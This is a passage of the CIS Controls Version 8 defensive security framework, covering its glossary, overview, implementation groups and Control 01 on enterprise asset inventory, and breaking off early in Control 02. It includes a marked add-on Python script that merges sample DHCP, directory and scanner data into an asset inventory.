CIS Controls Version 8

Contents
Glossary  iv
Acronyms and Abbreviations  vii
Overview  1
  Introduction  1
  This Version of the CIS Controls  3
  The CIS Controls Ecosystem (“It’s not about the list”)  4
  How to Get Started  5
  Using or Transitioning from Prior Versions of the CIS Controls  5
  Structure of the CIS Controls  5
  Implementation Groups  6
Control 01  Inventory and Control of Enterprise Assets  8
  Why is this Control critical?  8
  Procedures and tools  9
  Safeguards  10
Control 02  Inventory and Control of Software Assets  11
  Why is this Control critical?  11
  Procedures and tools  12
  Safeguards  12
Control 03  Data Protection  14
  Why is this Control critical?  14
  Procedures and tools  15
  Safeguards  15
Control 04  Secure Configuration of Enterprise Assets and Software  17
  Why is this Control critical?  17
  Procedures and tools  18
  Safeguards  19
Control 05  Account Management  20
  Why is this Control critical?  20
  Procedures and tools  21
  Safeguards  21
Control 06  Access Control Management  23
  Why is this Control critical?  23
  Procedures and tools  24
  Safeguards  24
Control 07  Continuous Vulnerability Management  26
  Why is this Control critical?  26
  Procedures and tools  27
  Safeguards  28
Control 08  Audit Log Management  29
  Why is this Control critical?  29
  Procedures and tools  29
  Safeguards  30
Control 09  Email and Web Browser Protections  31
  Why is this Control critical?  31
  Procedures and tools  31
  Safeguards  32
Control 10  Malware Defenses  34
  Why is this Control critical?  34
  Procedures and tools  34
  Safeguards  35
Control 11  Data Recovery  36
  Why is this Control critical?  36
  Procedures and tools  37
  Safeguards  37
Control 12  Network Infrastructure Management  38
  Why is this Control critical?  38
  Procedures and tools  39
  Safeguards  39
Control 13  Network Monitoring and Defense  41
  Why is this Control critical?  41
  Procedures and tools  42
  Safeguards  42
Control 14  Security Awareness and Skills Training  44
  Why is this Control critical?  44
  Procedures and tools  44
  Safeguards  45
Control 15  Service Provider Management  47
  Why is this Control critical?  47
  Procedures and tools  48
  Safeguards  48
Control 16  Application Software Security  50
  Why is this Control critical?  50
  Procedures and tools  51
  Safeguards  53
Control 17  Incident Response Management  55
  Why is this Control critical?  55
  Procedures and tools  56
  Safeguards  56
Control 18  Penetration Testing  58
  Why is this Control critical?  58
  Procedures and tools  59
  Safeguards  60
Appendix A  Resources and References  A1
Appendix B  Controls and Safeguards Index  B1


Glossary

Administrator accounts: Dedicated accounts with escalated privileges and used for managing aspects of a computer, domain, or the whole enterprise information technology infrastructure. Common administrator account subtypes include root accounts, local administrator and domain administrator accounts, and network or security appliance administrator accounts.

Application: A program, or group of programs, hosted on enterprise assets and designed for end-users. Applications are considered a software asset in this document. Examples include web, database, cloud-based, and mobile applications.

Authentication systems: A system or mechanism used to identify a user through associating an incoming request with a set of identifying credentials. The credentials provided are compared to those on a file in a database of the authorized user’s information on a local operating system, user directory service, or within an authentication server. Examples of authentication systems can include active directory, Multi-Factor Authentication (MFA), biometrics, and tokens.

Authorization systems: A system or mechanism used to determine access levels or user/client privileges related to system resources including files, services, computer programs, data, and application features. An authorization system grants or denies access to a resource based on the user’s identity. Examples of authorization systems can include active directory, access control lists, and role-based access control lists.

Cloud environment: A virtualized environment that provides convenient, on-demand network access to a shared pool of configurable resources such as network, computing, storage, applications, and services. There are five essential characteristics to a cloud environment: on-demand self-service, broad network access, resource pooling, rapid elasticity, and measured service. Some services offered through cloud environments include Software as a Service (SaaS), Platform as a Service (PaaS), and Infrastructure as a Service (IaaS).

Database: Organized collection of data, generally stored and accessed electronically from a computer system. Databases can reside remotely or on-site. Database Management Systems (DMSs) are used to administer databases, and are not considered part of a database for this document.

End-user devices: Information technology (IT) assets used among members of an enterprise during work, off-hours, or any other purpose. End-user devices include mobile and portable devices such as laptops, smartphones and tablets, as well as desktops and workstations. For the purpose of this document, end-user devices are a subset of enterprise assets.

Enterprise assets: Assets with the potential to store or process data. For the purpose of this document, enterprise assets include end-user devices, network devices, non-computing/Internet of Things (IoT) devices, and servers, in virtual, cloud-based, and physical environments.

Externally-exposed enterprise assets: Refers to enterprise assets that are public facing and discoverable through domain name system reconnaissance and network scanning from the public internet outside of the enterprise’s network.

Internal enterprise assets: Refers to non-public facing enterprise assets that can only be identified through network scans and reconnaissance from within an enterprise’s network through authorized authenticated or unauthenticated access.

Library: Pre-written code, classes, procedures, scripts, configuration data, and more, used to develop software programs and applications. It is designed to assist both the programmer and the programming language compiler in building and executing software.

Mobile end-user devices: Small, enterprise issued end-user devices with intrinsic wireless capability, such as smartphones and tablets. Mobile end-user devices are a subset of portable end-user devices, including laptops, which may require external hardware for connectivity. For the purpose of this document, mobile end-user devices are a subset of end-user devices.

Network devices: Electronic devices required for communication and interaction between devices on a computer network. Network devices include wireless access points, firewalls, physical/virtual gateways, routers, and switches. These devices consist of physical hardware, as well as virtual and cloud-based devices. For the purpose of this document, network devices are a subset of enterprise assets.

Network infrastructure: Refers to all of the resources of a network that make network or internet connectivity, management, business operations, and communication possible. It consists of hardware and software, systems and devices, and it enables computing and communication between users, services, applications, and processes. Network infrastructure can be cloud, physical, or virtual.

Non-computing/Internet of Things (IoT) devices: Devices embedded with sensors, software, and other technologies for the purpose of connecting, storing, and exchanging data with other devices and systems over the internet. While these devices are not used for computational processes, they support an enterprise’s ability to conduct business processes. Examples of these devices include printers, smart screens, physical security sensors, industrial control systems, and information technology sensors. For the purpose of this document, non-computing/IoT devices are a subset of enterprise assets.

Operating system: System software on enterprise assets that manages computer hardware and software resources, and provides common services for programs. Operating systems are considered a software asset and can be single- and multi-tasking, single- and multi-user, distributed, templated, embedded, real-time, and library.

Physical environment: Physical hardware parts that make up a network, including cables and routers. The hardware is required for communication and interaction between devices on a network.

Portable end-user devices: Transportable, end-user devices that have the capability to wirelessly connect to a network. For the purpose of this document, portable end-user devices can include laptops and mobile devices such as smartphones and tablets, all of which are a subset of enterprise assets.

Remote devices: Any enterprise asset capable of connecting to a network remotely, usually from public internet. This can include enterprise assets such as end-user devices, network devices, non-computing/Internet of Things (IoT) devices, and servers.

Remote file systems: Enable an application that runs on an enterprise asset to access files stored on a different asset. Remote file systems often make other resources, such as remote non-computing devices, accessible from an asset. The remote file access takes place using some form of local area network, wide area network, point-to-point link, or other communication mechanism. These file systems are often referred to as network file systems or distributed file systems.

Removable media: Any type of storage device that can be removed from a computer while the system is running and allows data to be moved from one system to another. Examples of removable media include compact discs (CDs), digital versatile discs (DVDs) and Blu-ray discs, tape backups, as well as diskettes and universal serial bus (USB) drives.

Servers: A device or system that provides resources, data, services, or programs to other devices on either a local area network or wide area network. Servers can provide resources and use them from another system at the same time. Examples include web servers, application servers, mail servers, and file servers.

Service accounts: A dedicated account with escalated privileges used for running applications and other processes. Service accounts may also be created just to own data and configuration files. They are not intended to be used by people, except for performing administrative operations.

Services: Refers to a software functionality or a set of software functionalities, such as the retrieval of specified information or the execution of a set of operations. Services provide a mechanism to enable access to one or more capabilities, where the access is provided using a prescribed interface and based on the identity of the requestor per the enterprise’s usage policies.

Social engineering: Refers to a broad range of malicious activities accomplished through human interactions on various platforms, such as email or phone. It relies on psychological manipulation to trick users into making security mistakes or giving away sensitive information.

Software assets: Also referred to as software in this document, these are the programs and other operating information used within an enterprise asset. Software assets include operating systems and applications.

User accounts: An identity created for a person in a computer or computing system. For the purpose of this document, user accounts refer to “standard” or “interactive” user accounts with limited privileges and are used for general tasks such as reading email and surfing the web. User accounts with escalated privileges are covered under administrator accounts.

Virtual environment: Simulates hardware to allow a software environment to run without the need to use a lot of actual hardware. Virtualized environments are used to make a small number of resources act as many with plenty of processing, memory, storage, and network capacity. Virtualization is a fundamental technology that allows cloud computing to work.


Acronyms and Abbreviations
AAA  Authentication, Authorization, and Auditing
ACL  Access Control List
AD  Active Directory
AoC  Attestation of Compliance
API  Application Programming Interface
BEC  Business Email Compromise
C2  Command and Control
CCE  Common Configuration Enumeration
CDM  Community Defense Model
CIA  Confidentiality, Integrity, and Availability
CIS  Center for Internet Security
CIS-CAT  CIS Configuration Assessment Tool
COTS  Commercial off-the-Shelf
CPE  Common Platform Enumeration
CREST  Council of Registered Security Testers
CSA  Cloud Security Alliance
CSP  Cloud Service Provider
CVE  Common Vulnerabilities and Exposures
CVSS  Common Vulnerability Scoring System
DBIR  Data Breach Investigations Report
DEP  Data Execution Prevention
DG  Development Group
DHCP  Dynamic Host Configuration Protocol
DKIM  DomainKeys Identified Mail
DLP  Data Loss Prevention
DMARC  Domain-based Message Authentication, Reporting, and Conformance
DMS  Database Management System
DNS  Domain Name System
DPI  Deep Packet Inspection
EDR  Endpoint Detection and Response
EOL  End of Life
FFIEC  Federal Financial Institutions Examination Council
FISMA  Federal Information Security Modernization Act
GRC  Governance Risk and Compliance
HECVAT  Higher Education Community Vendor Assessment Toolkit
HIPAA  Health Insurance Portability and Accountability Act
HTTP  Hypertext Transfer Protocol
HTTPS  Hypertext Transfer Protocol Secure
IaaS  Infrastructure as a Service
IAM  Identity and Access Management
IDS  Intrusion Detection System
IG  Implementation Group
IOCs  Indicators of Compromise
IoT  Internet of Things
IP  Internet Protocol
IPS  Intrusion Prevention System
ISAC  Information Sharing and Analysis Center
ISO  International Organization for Standardization
IT  Information Technology
LotL  Living off the Land
MDM  Mobile Device Management
MFA  Multi-Factor Authentication
MITRE ATT&CK  MITRE Adversarial Tactics, Techniques, and Common Knowledge®
MS-ISAC  Multi-State Information Sharing and Analysis Center
NaaS  Network-as-a-Service
NCSA  National Cyber Security Alliance
NIDS  Network Intrusion Detection System
NIST  National Institute of Standards and Technology
OS  Operating System
OSS  Open Source Software
OVAL  Open Vulnerability and Assessment Language
OWASP  Open Web Application Security Project
PaaS  Platform as a Service
PAM  Privileged Access Management
PCI  Payment Card Industry
SaaS  Software as a Service
SAFECode  Software Assurance Forum for Excellence in Code
SCADA  Supervisory Control and Data Acquisition
SCAP  Security Content Automation Protocol
SIEM  Security Information and Event Management
SIP  System Integrity Protection
SMS  Short Messaging Service
SOC  Security Operations Center
SOC 2  Service Organization Control 2
SPAM  Something Posing as Mail
SPF  Sender Policy Framework
SQL  Structured Query Language
SSDF  Secure Software Development Framework
SSH  Secure Shell
SSO  Single Sign-On
Telnet  Teletype Network
TLS  Transport Layer Security
TTPs  Tactics, Techniques, and Procedures
U.K.  United Kingdom
URL  Uniform Resource Locator
USB  Universal Serial Bus
VPN  Virtual Private Network
WDEG  Windows Defender Exploit Guard
WPA2  Wi-Fi Protected Access 2
XCCDF  Extensible Configuration Checklist Description Format

Overview
Introduction
The CIS Controls® started as a simple grassroots activity to identify the most common and important real-world cyber-attacks that affect enterprises every day, translate that knowledge and experience into positive, constructive action for defenders, and then share that information with a wider audience. The original goals were modest—to help people and enterprises focus their attention and get started on the most important steps to defend themselves from the attacks that really mattered.

Led by the Center for Internet Security® (CIS®), the CIS Controls have matured into an international community of volunteer individuals and institutions that:
• Share insights into attacks and attackers, identify root causes, and translate that into classes of defensive action
• Create and share tools, working aids, and stories of adoption and problem-solving
• Map the CIS Controls to regulatory and compliance frameworks in order to ensure alignment and bring collective priority and focus to them
• Identify common problems and barriers (like initial assessment and implementation roadmaps), and solve them as a community

The CIS Controls reflect the combined knowledge of experts from every part of the ecosystem (companies, governments, individuals), with every role (threat responders and analysts, technologists, information technology (IT) operators and defenders, vulnerability-finders, tool makers, solution providers, users, policy-makers, auditors, etc.), and across many sectors (government, power, defense, finance, transportation, academia, consulting, security, IT, etc.), who have banded together to create, adopt, and support the CIS Controls.

Evolution of the CIS Controls

The CIS Controls started like many similar activities; we gathered experts together, and shared and argued until we reached an agreement. This can be very valuable, depending on the people at the table and their experience. Through documenting and sharing the output, all enterprises can benefit from the work of people they cannot hire or even meet. You can improve the outcome (and your confidence in it) through selecting experts that represent a wide range of knowledge, bringing consistency to the process, and ensuring use of the best-available information (especially about attacks). In the end, you are still depending on the good judgment of a relatively small group of people, captured in an informal and narrative way.

At CIS, we have been on a multi-year path to bring more data, rigor, and transparency to the process of best practice recommendations (the CIS Benchmarks™ and the CIS Controls). All of these elements are essential to the maturation of a science to underlie cyber defense; and, all are necessary to allow the tailoring and “negotiation” of security actions applicable in specific cases, and as required through specific security frameworks, regulations, and similar oversight schemes.

In the earliest versions of the CIS Controls, we used a standard list of publicly known attacks as a simple and informal test of the usefulness of specific recommendations. Starting in 2013, we worked with the Verizon Data Breach Investigations Report (DBIR) team to map the results of their large-scale data analysis directly to the CIS Controls, as a way to match their summaries of attacks into a standard program for defensive improvement.

CIS has recently released the Community Defense Model (CDM), which is our most data-driven approach so far. In its initial version, the CDM looks at the conclusions from the most recent Verizon DBIR, along with data from the Multi-State Information Sharing and Analysis Center® (MS-ISAC®), to identify what we believe to be the five most important types of attacks. We describe those attacks using the MITRE Adversarial Tactics, Techniques, and Common Knowledge® (MITRE ATT&CK®) Framework in order to create attack patterns (or specific combinations of Tactics and Techniques used in those attacks). This allows us to analyze the value of individual defensive actions (i.e., Safeguards[1]) against those attacks. Specifically, it also provides a consistent and explainable way to look at the security value of a given set of defensive actions across the attacker’s life cycle, and provide a basis for strategies like defense-in-depth. The details of this analysis are available on the CIS website. The bottom line is that we have taken a major step towards identifying the security value of the CIS Controls, or any subset of them. While these ideas are still evolving, at CIS we are committed to the idea of security recommendations based on data, presented transparently. For additional information, reference https://www.cisecurity.org/controls/v8/.

These activities ensure that the CIS Security Best Practices (which include the CIS Controls and CIS Benchmarks) are more than a checklist of “good things to do,” or “things that could help”; instead, they are a prescriptive, prioritized, highly focused set of actions that have a community support network to make them implementable, usable, scalable, and in alignment with all industry or government security requirements.

This Version of the CIS Controls

When we begin the work of a new version, we first sit down to establish “design principles” that will be used to guide the process. These serve as a decision “touchstone” to remind us of what is really important, and of the goals of the CIS Controls. While these have been fairly consistent since the earliest versions of the CIS Controls, we have been refining our thinking over the last couple of versions to focus on the role that the CIS Controls play in the total picture of enterprise security.

Our design principles include:

• Offense Informs Defense – CIS Controls are selected, dropped, and prioritized based on data, and on specific knowledge of attacker behavior and how to stop it
• Focus
  – Help defenders identify the most critical things they need to do to stop the most important attacks
  – Avoid being tempted to solve every security problem—avoid adding “good things to do” or “things you could do”
• Feasible – All individual recommendations (Safeguards) must be specific and practical to implement
• Measurable
  – All CIS Controls, especially for Implementation Group 1, must be measurable
  – Simplify or remove ambiguous language to avoid inconsistent interpretation
  – Some Safeguards may have a threshold
• Align – Create and demonstrate “peaceful co-existence” with other governance, regulatory, process management schemes, frameworks, and structures
  – Cooperate with and point to existing, independent standards and security recommendations where they exist, e.g., National Institute of Standards and Technology® (NIST®), Cloud Security Alliance (CSA), Software Assurance Forum for Excellence in Code (SAFECode), ATT&CK, Open Web Application Security Project® (OWASP®)

[1] “Safeguards” were known as “Sub-Controls” prior to Version 8 of the CIS Controls.

In addition, since Version 7, we have all seen significant changes in technology and the cybersecurity ecosystem. Movement to cloud-based computing, virtualization, mobility, outsourcing, Work-from-Home, and changing attacker tactics have been central in every discussion. Physical devices, fixed boundaries, and discrete islands of security implementation are less important, and so we reflect that in Version 8, through revised terminology and grouping of Safeguards. Also, to guide adopters in implementing Version 8, CIS created a glossary to remove ambiguity of terminology. Some ideas have been combined or grouped differently to more naturally reflect the evolution of technology, rather than how enterprise teams or responsibilities might be organized, and always referring back to our guiding principles.

The text of the CIS Controls document is just one step of a process to design, implement, measure, report, and manage enterprise security. Taking this entire work stream into account as we write the CIS Controls, we can support the total enterprise management process through: making sure that each Safeguard asks for “one thing,” wherever possible, in a way that is clear and requires minimal interpretation; that we focus on measurable actions, and define the measurement as part of the process; and, that we simplify the language to avoid duplication.

At CIS, we have always tried to be very conscious of the balance between addressing current topics and the stability of an overall defensive improvement program. We have always tried to focus on the foundations of good cyber defense—and, always tried to keep our eyes on emerging new defensive technology—while avoiding the “shiny new toys” or complex technology that is out of reach for most enterprises.

The CIS Controls Ecosystem (“It’s not about the list”)

Whether you use the CIS Controls, and/or another way to guide your security improvement program, you should recognize that “it’s not about the list.” You can get a credible list of security recommendations from many sources—it is best to think of the list as a starting point. It is important to look for the ecosystem that grows up around the list. Where can I get training, complementary information, explanations; how have others implemented and used these recommendations; is there a marketplace of vendor tools and services to choose from; how will I measure progress or maturity; how does this align with the myriad regulatory and compliance frameworks that apply to me? The true power of the CIS Controls is not about creating the best list, it is about harnessing the experience of a community of individuals and enterprises to actually make security improvements through the sharing of ideas, tools, lessons, and collective action.

To support this, CIS acts as a catalyst and clearinghouse to help us all learn from each other. Since Version 6, there has been an explosion of complementary information, products, and services available from CIS, and from the industry-at-large. Please contact CIS for the following kinds of working aids and other support materials, https://www.cisecurity.org/controls/v8/:
• Mappings from the CIS Controls to a very wide variety of formal Risk Management Frameworks (like NIST®, Federal Information Security Modernization Act (FISMA), International Organization for Standardization (ISO), etc.)
• Use cases of enterprise adoption
• A list of ongoing references to the CIS Controls in national and international standards, state and national legislation and regulation, trade and professional associations, etc.
• Information tailored for small and medium enterprises
• Measurement and metrics for the CIS Controls
• Pointers to vendor white papers and other materials that support the CIS Controls
• Documentation on alignment with the NIST® Cybersecurity Framework

How to Get Started

Historically, the CIS Controls were ordered in sequence to focus an enterprise’s cybersecurity activities, with a subset of the first six CIS Controls referred to as “cyber hygiene.” However, this proved to be too simplistic. Enterprises, especially small ones, could struggle with some of the early Safeguards and never get around to implementing later CIS Controls (for example, having a backup strategy to help recover from ransomware). As a result, starting with Version 7.1, we created CIS Controls Implementation Groups (IGs) as our recommended new guidance to prioritize implementation.

The CIS Controls IGs are self-assessed categories for enterprises. Each IG identifies a subset of the CIS Controls that the community has broadly assessed to be applicable for an enterprise with a similar risk profile and resources to strive to implement. These IGs represent a horizontal look across the CIS Controls tailored to different types of enterprises. Specifically, we have defined IG1 as “basic cyber hygiene,” the foundational set of cyber defense Safeguards that every enterprise should apply to guard against the most common attacks (https://www.cisecurity.org/controls/v8/). Each IG then builds upon the previous one: IG2 includes IG1, and IG3 includes all CIS Safeguards in IG1 and IG2.

Using or Transitioning from Prior Versions of the CIS Controls

We believe that Version 8 of the CIS Controls is the best we have ever produced. We also appreciate that enterprises who are actively using prior versions of the CIS Controls as a key part of their defensive strategy might be reluctant to move to Version 8. Our recommendation is that if you are using Version 7 or Version 7.1, you are following an effective and usable security plan, and over time you should consider moving to Version 8. If you are using Version 6 (or earlier), our recommendation is that you should start to plan a transition to Version 8 as soon as practicable.

For prior versions of the CIS Controls, we were able to provide only the simplest tools to aid in transition from prior versions, basically a spreadsheet-based change log. For Version 8, we have taken a much more holistic approach and worked with numerous partners to ensure that the CIS Controls ecosystem is ready to support your transition, https://www.cisecurity.org/controls/v8/.

Structure of the CIS Controls

The presentation of each Control in this document includes the following elements:
• Overview. A brief description of the intent of the Control and its utility as a defensive action
• Why is this Control critical? A description of the importance of this Control in blocking, mitigating, or identifying attacks, and an explanation of how attackers actively exploit the absence of this Control
• Procedures and tools. A more technical description of the processes and technologies that enable implementation and automation of this Control
• Safeguard descriptions. A table of the specific actions that enterprises should take to implement the Control

Implementation Groups

IG1

An IG1 enterprise is small to medium-sized with limited IT and cybersecurity expertise to
dedicate towards protecting IT assets and personnel. The principal concern of these
enterprises is to keep the business operational, as they have a limited tolerance for
downtime. The sensitivity of the data that they are trying to protect is low and principally
surrounds employee and financial information.

Safeguards selected for IG1 should be implementable with limited cybersecurity expertise and
aimed to thwart general, non-targeted attacks. These Safeguards will also typically be
designed to work in conjunction with small or home office commercial off-the-shelf (COTS)
hardware and software.

IG2 (Includes IG1)

An IG2 enterprise employs individuals responsible for managing and protecting IT
infrastructure. These enterprises support multiple departments with differing risk profiles
based on job function and mission. Small enterprise units may have regulatory compliance
burdens. IG2 enterprises often store and process sensitive client or enterprise information and
can withstand short interruptions of service. A major concern is loss of public confidence if a
breach occurs.



Safeguards selected for IG2 help security teams cope with increased operational complexity.
Some Safeguards will depend on enterprise-grade technology and specialized expertise to
properly install and configure.

IG3 (Includes IG1 and IG2)

An IG3 enterprise employs security experts that specialize in the different facets of
cybersecurity (e.g., risk management, penetration testing, application security). IG3 assets and
data contain sensitive information or functions that are subject to regulatory and compliance
oversight. An IG3 enterprise must address availability of services and the confidentiality and
integrity of sensitive data. Successful attacks can cause significant harm to the public welfare.

Safeguards selected for IG3 must abate targeted attacks from a sophisticated adversary and
reduce the impact of zero-day attacks.

Control 01: Inventory and Control of Enterprise Assets

Safeguards: Total 5 | IG1 2/5 | IG2 4/5 | IG3 5/5

Overview. Actively manage (inventory, track, and correct) all enterprise assets
(end-user devices, including portable and mobile; network devices;
non-computing/Internet of Things (IoT) devices; and servers)
connected to the infrastructure physically, virtually, remotely, and those
within cloud environments, to accurately know the totality of assets
that need to be monitored and protected within the enterprise. This
will also support identifying unauthorized and unmanaged assets to
remove or remediate.

Why is this Control critical?

Enterprises cannot defend what they do not know they have. Managed control of all
enterprise assets also plays a critical role in security monitoring, incident response, system
backup, and recovery. Enterprises should know what data is critical to them, and proper asset
management will help identify those enterprise assets that hold or manage this critical data,
so that appropriate security controls can be applied.

External attackers are continuously scanning the internet address space of target enterprises,
premise-based or in the cloud, identifying possibly unprotected assets attached to an
enterprise’s network. Attackers can take advantage of new assets that are installed, yet not
securely configured and patched. Internally, unidentified assets can also have weak security
configurations that can make them vulnerable to web- or email-based malware; and,
adversaries can leverage weak security configurations for traversing the network, once they
are inside.

Additional assets that connect to the enterprise’s network (e.g., demonstration systems,
temporary test systems, guest networks) should be identified and/or isolated in order to
prevent adversarial access from affecting the security of enterprise operations.

Large, complex, dynamic enterprises understandably struggle with the challenge of managing
intricate, fast-changing environments. However, attackers have shown the ability, patience,
and willingness to “inventory and control” our enterprise assets at very large scale in order to
support their opportunities.

Another challenge is that portable end-user devices will periodically join a network and then
disappear, making the inventory of currently available assets very dynamic. Likewise, cloud
environments and virtual machines can be difficult to track in asset inventories when they are
shut down or paused.

Another benefit of complete enterprise asset management is supporting incident response,
both when investigating the origination of network traffic from an asset on the network and
when identifying all potentially vulnerable, or impacted, assets of similar type or location
during an incident.

Procedures and tools

This CIS Control requires both technical and procedural actions, united in a process that
accounts for, and manages the inventory of, enterprise assets and all associated data
throughout its life cycle. It also links to business governance through establishing data/asset
owners who are responsible for each component of a business process. Enterprises can use
large-scale, comprehensive enterprise products to maintain IT asset inventories. Smaller
enterprises can leverage security tools already installed on enterprise assets or used on the
network to collect this data. This includes doing a discovery scan of the network with a
vulnerability scanner; reviewing anti-malware logs, logs from endpoint security portals,
network logs from switches, or authentication logs; and managing the results in a spreadsheet
or database.

Maintaining a current and accurate view of enterprise assets is an ongoing and dynamic
process. Even for enterprises, there is rarely a single source of truth, as enterprise assets are
not always provisioned or installed by the IT department. The reality is that a variety of
sources need to be “crowd-sourced” to determine a high-confidence count of enterprise
assets. Enterprises can actively scan on a regular basis, sending a variety of different packet
types to identify assets connected to the network. In addition to asset sources mentioned
above for small enterprises, larger enterprises can collect data from cloud portals and logs
from enterprise platforms such as: Active Directory (AD), Single Sign-On (SSO), Multi-Factor
Authentication (MFA), Virtual Private Network (VPN), Intrusion Detection Systems (IDS) or
Deep Packet Inspection (DPI), Mobile Device Management (MDM), and vulnerability scanning
tools. Property inventory databases, purchase order tracking, and local inventory lists are
other sources of data to determine which devices are connected. There are tools and
methods that normalize this data to identify devices that are unique among these sources.
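To make the “crowd-sourcing” and normalization described above concrete, the following Python script is an added example; it is not part of the CIS Controls document and not any CIS or vendor tool. It merges three constructed sources (DHCP lease log lines, a directory export, and a discovery scanner export) into one inventory keyed by normalized hardware address, joins the directory export on hostname because that source carries no MAC, and lists devices that are not on an approved list as input for the weekly process in Safeguard 1.2. The log line format, the export layouts, the approved list, and every sample value are assumptions made for the example.

```python
"""Crowd-sourced asset inventory: merge several sources into one view.

Added example (not from the CIS Controls document). All inputs below are
constructed sample data; the field layouts are assumptions, not any
vendor's real export format.
"""
import re
from collections import defaultdict

# Constructed sample inputs (hypothetical formats).
DHCP_LOG = """\
2024-03-01T08:02:11 DHCPACK on 10.0.5.23 to 00:1a:2b:3c:4d:5e (laptop-ann) via eth0
2024-03-01T08:05:40 DHCPACK on 10.0.5.77 to aa:bb:cc:dd:ee:ff (printer-2f) via eth0
2024-03-01T09:11:02 DHCPACK on 10.0.5.91 to 12:34:56:78:9a:bc (unknown-rpi) via eth0
"""

AD_EXPORT = [  # (hostname, owner, department) from a directory export
    ("LAPTOP-ANN", "ann", "finance"),
    ("SRV-FILES01", "it", "it"),
]

SCANNER_EXPORT = [  # (ip, mac, hostname) from a discovery scan
    ("10.0.5.23", "00-1A-2B-3C-4D-5E", "laptop-ann.corp"),
    ("10.0.5.91", "12-34-56-78-9A-BC", ""),
    ("10.0.5.10", "de-ad-be-ef-00-01", "srv-files01.corp"),
]

# Constructed approved list (the "approved to connect" flag of Safeguard 1.1).
APPROVED_MACS = {"00:1a:2b:3c:4d:5e", "aa:bb:cc:dd:ee:ff", "de:ad:be:ef:00:01"}

DHCP_RE = re.compile(r"DHCPACK on (\S+) to (\S+)(?: \((\S+)\))?")


def norm_mac(mac):
    """Normalize a MAC to lower-case colon form so sources can be joined."""
    hexdigits = re.sub(r"[^0-9a-fA-F]", "", mac).lower()
    if len(hexdigits) != 12:
        raise ValueError(f"bad MAC: {mac!r}")
    return ":".join(hexdigits[i:i + 2] for i in range(0, 12, 2))


def norm_host(name):
    """Short, lower-case hostname (DNS suffix dropped); '' if unknown."""
    return name.split(".")[0].lower() if name else ""


def build_inventory(dhcp_log=DHCP_LOG, ad=AD_EXPORT, scanner=SCANNER_EXPORT,
                    approved=APPROVED_MACS):
    """Merge the sources into {mac: record}, one record per unique device."""
    inv = defaultdict(lambda: {"ips": set(), "hostname": "", "owner": "",
                               "department": "", "sources": set(),
                               "approved": False})
    for line in dhcp_log.splitlines():
        m = DHCP_RE.search(line)
        if not m:
            continue
        ip, mac, host = m.groups()
        rec = inv[norm_mac(mac)]
        rec["ips"].add(ip)
        rec["hostname"] = rec["hostname"] or norm_host(host or "")
        rec["sources"].add("dhcp")
    for ip, mac, host in scanner:
        rec = inv[norm_mac(mac)]
        rec["ips"].add(ip)
        rec["hostname"] = rec["hostname"] or norm_host(host)
        rec["sources"].add("scanner")
    # The directory export has no MAC: join it on the normalized hostname.
    by_host = {r["hostname"]: r for r in inv.values() if r["hostname"]}
    for host, owner, dept in ad:
        rec = by_host.get(norm_host(host))
        if rec:
            rec["owner"], rec["department"] = owner, dept
            rec["sources"].add("ad")
    for mac, rec in inv.items():
        rec["approved"] = mac in approved
    return dict(inv)


def unauthorized(inventory):
    """MACs seen on the network but not approved (input to Safeguard 1.2)."""
    return sorted(mac for mac, r in inventory.items() if not r["approved"])


if __name__ == "__main__":
    inv = build_inventory()
    for mac, r in sorted(inv.items()):
        print(mac, r["hostname"] or "?", sorted(r["ips"]), sorted(r["sources"]),
              "APPROVED" if r["approved"] else "UNAUTHORIZED")
```

Keying on the hardware address is what lets a DHCP lease and a scanner hit collapse into one device even when the hostname differs or is missing; a device seen by only one source still appears, which is the point of using several sources.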

→ For cloud-specific guidance, refer to the CIS Controls Cloud Companion
Guide – https://www.cisecurity.org/controls/v8/

→ For tablet and smart phone guidance, refer to the CIS Controls Mobile Companion
Guide – https://www.cisecurity.org/controls/v8/

→ For IoT guidance, refer to the CIS Controls Internet of Things Companion
Guide – https://www.cisecurity.org/controls/v8/

→ For Industrial Control Systems (ICS) guidance, refer to the CIS Controls ICS Implementation Guide –
https://www.cisecurity.org/controls/v8/
Safeguards

1.1 Establish and Maintain Detailed Enterprise Asset Inventory
Asset Type: Devices | Security Function: Identify | Implementation Groups: IG1, IG2, IG3
Establish and maintain an accurate, detailed, and up-to-date inventory of all enterprise assets with the potential to store or
process data, to include: end-user devices (including portable and mobile), network devices, non-computing/IoT devices, and
servers. Ensure the inventory records the network address (if static), hardware address, machine name, data asset owner,
department for each asset, and whether the asset has been approved to connect to the network. For mobile end-user
devices, MDM type tools can support this process, where appropriate. This inventory includes assets connected to the
infrastructure physically, virtually, remotely, and those within cloud environments. Additionally, it includes assets that are
regularly connected to the enterprise’s network infrastructure, even if they are not under control of the enterprise. Review
and update the inventory of all enterprise assets bi-annually, or more frequently.

1.2 Address Unauthorized Assets
Asset Type: Devices | Security Function: Respond | Implementation Groups: IG1, IG2, IG3
Ensure that a process exists to address unauthorized assets on a weekly basis. The enterprise may choose to remove the
asset from the network, deny the asset from connecting remotely to the network, or quarantine the asset.

1.3 Utilize an Active Discovery Tool
Asset Type: Devices | Security Function: Detect | Implementation Groups: IG2, IG3
Utilize an active discovery tool to identify assets connected to the enterprise’s network. Configure the active discovery tool to
execute daily, or more frequently.

1.4 Use Dynamic Host Configuration Protocol (DHCP) Logging to Update Enterprise Asset Inventory
Asset Type: Devices | Security Function: Identify | Implementation Groups: IG2, IG3
Use DHCP logging on all DHCP servers or Internet Protocol (IP) address management tools to update the
enterprise’s asset inventory. Review and use logs to update the enterprise’s asset inventory weekly, or more
frequently.

1.5 Use a Passive Asset Discovery Tool
Asset Type: Devices | Security Function: Detect | Implementation Groups: IG3
Use a passive discovery tool to identify assets connected to the enterprise’s network. Review and use scans to update the
enterprise’s asset inventory at least weekly, or more frequently.

Control 02: Inventory and Control of Software Assets

Safeguards: Total 7 | IG1 3/7 | IG2 6/7 | IG3 7/7

Overview. Actively manage (inventory, track, and correct) all software (operating
systems and applications) on the network so that only authorized
software is installed and can execute, and that unauthorized and
unmanaged software is found and prevented from installation or
execution.

Why is this Control critical?

A complete software inventory is a critical foundation for preventing attacks. Attackers
continuously scan target enterprises looking for vulnerable versions of software that can be
remotely exploited. For example, if a user opens a malicious website or attachment with a
vulnerable browser, an attacker can often install backdoor programs and bots that give the
attacker long-term control of the system. Attackers can also use this access to move laterally
through the network. One of the key defenses against these attacks is updating and patching
software. However, without a complete inventory of software assets, an enterprise cannot
determine if they have vulnerable software, or if there are potential licensing violations.

Even if a patch is not yet available, a complete software inventory list allows an
enterprise to guard against known attacks until the patch is released. Some sophisticated
attackers use “zero-day exploits,” which take advantage of previously unknown
